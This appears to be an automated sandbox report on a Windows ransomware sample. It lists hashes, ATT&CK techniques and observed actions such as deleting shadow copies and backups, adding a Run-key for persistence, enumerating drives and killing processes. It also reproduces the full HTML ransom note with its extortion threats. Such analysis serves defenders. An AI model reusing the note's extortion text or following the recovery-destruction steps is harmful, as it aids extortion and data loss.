b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
27-02-2024 17:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
Size

335KB
MD5

a286b1e0dc7e26204e9751423ff1e842
SHA1

394e03d3010222b571d1a70bde0233407435bcf1
SHA256

b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f
SHA512

7d6c8f8f829f72b89783598e01baf7b597e459a9c210b6dbd3d8aaaeb3aa93e99e309c9155ef7832bd1ff88d4806448b73744136dc59022fe3ddfaf1d1faa23f
SSDEEP

6144:5Y9zfajnC6iGm15k66Clhdq8yZXlkV68pr2g1PJbmV6Mqu:m9WHm15k66ClHq8yZVypHMqu

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Path

\Device\HarddiskVolume1\Boot\cs-CZ\How_to_back_files.html

Ransom Note

<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">AO86pph/KCd0Fy/8RgWQhFu/jUCIs6ea/iTFz8qZyuTIgQ2aVuxQ+aRtgX/HoCzB+xdLecW5TQM1ERWQWhD4UC86T8bWGrP1PGOJbRkuDl+juEq47Z7e+R8w2CsRo91mTM3N/lk00cIjduXljtF6LdKkjqcwiCxYgvNEHMipaecf01bDuhXNj99HA0j+mBuhYGBAR4zx61fZ7ocAcp0usHqjXPVn6Palj03JCGS8B8O2ClkPBufhwDk8xYH89tHqeT9kVxz9aFtVqmwi1JwFxriQyv6JG0ZxPY7eGh6MJCpNtz+xoYY62+I0FvQcuSXwI8aosmCErSCt4u7OuvX1VQMTE687fBlFEBGzcdIki2rmtpmGI/BAMmDeAfqOsZjOEp/Up4lNGtdHrObgCSsSjydNrmGjGIlhk9kCtR2gtGsLqP+8gMsGmgixa9O0k6c7NYuZH8xLtxrYYWaRShbjfA4CM7WVfmjiBeax2/6Mx9xNVh2iwZt1Hxid0bsjQPzKGx9AeDgUAtVH2OZ7qSrEWAgTh1kTTMeTwS/oCq/t3MDpDUe1y2gHPPJ41PDQPQXA6DsUELWw0v4HL84ZEu0qcbKN6D+jzSF94/DdI9SMxM3K1NV3nwLWdRkNgm6Tebvrptx78/p54i/MtZt6TkYwsv/f5gObyMqQ483Y/MR8eJMEfSHuX9SIvlYY5lkRmcU29gH8K7PgAiDp/AAuHvmUo56tkoWsq8h9/jkO88rrjoK1bwCX8FmcICXeJuLDza+AdTQp0lFw/3y3gLZpCGoip/PlaiNQdj/UGO0eCzy7JLeTy5w+uzfjylDi3S5/kB/G5NMsf+ZENBaGY31IIQkE9IsmRHW7q+xnpsadZnhADXL+TL3gA2EMoZYCvqE1F3/5YieZh38lYvCozJDS1k4A+pjugxiXMl41JFf1v4/YEvwrzbq/qnnC3pYxN2fcci26roly/78/flzdbtu1k3fsmZ3R/2AbIEnUkefzgFznqN9NMcueb+PO0BGP/QToP6oLAFBla2ik4eHcWCslqqYzoYFo9tq7cyDvKhnbukoeSpDYYy/nlUtY7l8oYNO8MFZrHPBwuUaFgsX0VTF9uiwsd4yHBqM4hRjXtjjKH7i0+RLEtnN1NS+zWy37vMyxeh8koNgQ+9yfaSq1BVg/TK36JkqkwcTgGR96QzXE8RKLo/BICwGRfn7yAYnqX171eg0lLwJ4qDAkmiCXmQv5bigIbiXQ8svE7CLXXSoYEAYl8fAStffZq8GmtR2zoqRhoIeSSYM9Nn2GYbs3dAfeh7TB/qIZzNOe3TjmdgW+SxPsfJz68abJ1+OvFlNgdk2Z3s6aIbXbdq972uivDFZWR84CFN5bPTMHPGMj3PPhnolCF8gZc0cWmRmUwdvHDfCc8WIrsmMuFyk8cJQftUitKwQOfoy2N9E7HRloZRYrA77hAIV3rfCzKulrjqi2GzBM9vQKnKFPcHkof7MhkNHDARmziIXlVZPX8OobYgkAuYfh7eM/zDCYJ9mMpRa9NPhDJxAl+lgSCh/zT3Q1HXUh7B6itaszoi0hlnfBrGDUTEEo6+HgAW+rVLjEpJYj8451N5l+SJSWcWhg4h+kLqh2EKQWWhXaY3Ro59OXToDANkKEHbQ2EV+3ApJI4yVSXhA9QNJCIPp08TTcqhoxYQJZz4AbWzJeDAEnlolF8jLsHZftk5k=</span> <br>  </div> </div>  <div class="tabs">  <div class="tab"> <div id="tab-content1" class="content"> <div class="text">  <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br>  <hr> <b>Contact us for price and get decryption software.</b><br><br> <hr> <b>email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> </div> </div> </div>   </div> </div>  </div> </div> </body> </html>

Emails

href="[email protected]

">[email protected]

href="[email protected]

">[email protected]

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe

description pid process target process

PID 1104 created 3552 1104 b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe Explorer.EXE
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

4892 bcdedit.exe
3992 bcdedit.exe
Renames multiple (6530) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Deletes System State backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

4876 wbadmin.exe
Deletes system backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

4596 wbadmin.exe

description	pid	process	target process
PID 1104 created 3552	1104	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe	Explorer.EXE

pid	process
4892	bcdedit.exe
3992	bcdedit.exe

pid	process
4876	wbadmin.exe

pid	process
4596	wbadmin.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exeb896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe\""	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe\""	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe

Enumerates connected drives 3 TTPs 26 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.execipher.execipher.exe

description	ioc	process
File opened (read-only)	\??\E:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\M:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\P:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\Q:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\R:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\F:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\J:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\L:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\V:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\A:	cipher.exe
File opened (read-only)	\??\G:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\I:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\K:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\N:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\H:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\Y:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\A:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\B:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\X:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\S:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\T:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\Z:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\O:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\U:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\W:	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened (read-only)	\??\F:	cipher.exe

Drops file in Program Files directory 64 IoCs

Processes:

b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe

description	ioc	process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-200_contrast-black.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSplashLogo.scale-100.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\it\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\flags.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files\Java\jre-1.8\lib\deploy\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Cultures\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\9.jpg	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\ja-JP\PackageManagementDscUtilities.strings.psd1	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\management\snmp.acl.template	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square44x44Logo.targetsize-72.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Home.aapp	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\sendforsignature.svg	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected]	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ar-ae\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\jdk\zlib.md	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupSmallTile.scale-125.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-80.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example3.Diagnostics\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\Internet Explorer\de-DE\iexplore.exe.mui	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue II.xml	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Configuration\card_terms_dict.txt	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Google.scale-200.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-60_altform-unplated.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred\oskpredbase.xml	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\8080_36x36x32.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp6-pl.xrm-ms	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\MediaInkToolbar.xbf	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-48.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files\Windows Security\BrowserCore\en-US\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\THMBNAIL.PNG	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\30.jpg	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-96_altform-lightunplated.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.targetsize-24.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-gb\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_MAK-ppd.xrm-ms	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_Mocking.help.txt	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\Assets\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\ui-strings.js	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\ui-strings.js	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\resources\strings\LocalizedStrings_th.json	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\CalculatorApp.winmd	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSmallTile.scale-125.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptyShare.scale-100.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Spiral.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubAppList.scale-100_contrast-white.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\cstm_brand_preview2x.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Retail-ul-phn.xrm-ms	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\MSWDS_ES.LEX	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppPackageStoreLogo.scale-125.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-125_contrast-white.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\en-GB\View3d\3DViewerProductDescription-universal.xml	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-white\SmallTile.scale-100.png	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File opened for modification	C:\Program Files\Common Files\System\es-ES\wab32res.dll.mui	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe
File created	C:\Program Files\Microsoft Office\root\Office16\Configuration\How_to_back_files.html	b896605b97ae9e2781b21dc5cfb64eec0fc4effa76a7ef33e9cef0b258dff35f.exe

Drops file in Windows directory 3 IoCs

Processes:

wbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

2688 vssadmin.exe

pid	process
2688	vssadmin.exe

Kills process with taskkill 14 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4184	taskkill.exe
3124	taskkill.exe
3448	taskkill.exe
4048	taskkill.exe
4488	taskkill.exe
1392	taskkill.exe
